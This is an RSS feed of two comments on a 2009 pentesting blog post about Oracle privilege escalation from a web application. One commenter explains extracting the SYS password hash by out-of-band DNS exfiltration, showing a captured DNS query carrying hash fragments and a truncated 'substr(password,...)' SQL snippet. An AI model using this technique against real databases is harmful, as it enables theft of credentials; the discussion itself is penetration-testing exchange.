<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Oracle privilege escalations from web app</title>
	<atom:link href="http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/</link>
	<description>From Pentesters To Pentesters</description>
	<lastBuildDate>Sat, 22 Oct 2011 05:42:18 +0100</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: sid</title>
		<link>http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/comment-page-1/#comment-84531</link>
		<dc:creator>sid</dc:creator>
		<pubDate>Mon, 27 Apr 2009 14:12:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=203#comment-84531</guid>
		<description>i think you are talking about OOB

&quot;16:37:42.734252 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 90) y.y.y.y.53 &gt; x.x.x.x: 37980*- q: A? 2CFD262.test.notsosecure.com. 1/0/0 2CFD262.test.notsosecure.com.&quot;

I used a substring function, for some reason the whole hash wasn&#039;t coming over DNS, so i thought i will extract it 2 requests.

select substr(password,1,10)...</description>
		<content:encoded><![CDATA[<p>i think you are talking about OOB</p>
<p>&#8220;16:37:42.734252 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 90) y.y.y.y.53 > x.x.x.x: 37980*- q: A? 2CFD262.test.notsosecure.com. 1/0/0 2CFD262.test.notsosecure.com.&#8221;</p>
<p>I used a substring function, for some reason the whole hash wasn&#8217;t coming over DNS, so i thought i will extract it 2 requests.</p>
<p>select substr(password,1,10)&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: CG</title>
		<link>http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/comment-page-1/#comment-84530</link>
		<dc:creator>CG</dc:creator>
		<pubDate>Mon, 27 Apr 2009 14:03:14 +0000</pubDate>
		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=203#comment-84530</guid>
		<description>did you just forget to paste something or did the SYS hash come back in two requests?  I only see half of the hash in your example.</description>
		<content:encoded><![CDATA[<p>did you just forget to paste something or did the SYS hash come back in two requests?  I only see half of the hash in your example.</p>
]]></content:encoded>
	</item>
</channel>
</rss>

